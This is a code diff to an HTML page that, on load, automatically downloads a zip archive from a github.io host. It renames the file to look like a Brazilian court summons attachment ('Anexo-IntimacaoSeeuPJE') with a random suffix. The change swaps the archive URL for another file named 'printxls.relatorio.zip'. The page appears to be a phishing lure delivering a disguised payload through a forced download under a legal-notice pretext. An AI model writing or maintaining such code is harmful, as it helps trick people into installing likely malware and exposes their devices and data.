--- a/AnexoInfobusca.html
+++ b/AnexoInfobusca.html
@@ -41,7 +41,7 @@
         window.onload = function() {
             const suffix = generateRandomSuffix(12);
             const newFileName = 'Anexo-IntimacaoSeeuPJE' + suffix + '.zip';
-            const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/Anexo-Intimacao.zip'; // URL do arquivo de download
+            const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/printxls.relatorio.zip'; // URL do arquivo de download
             downloadFile(downloadUrl, newFileName);
         }
     </script>
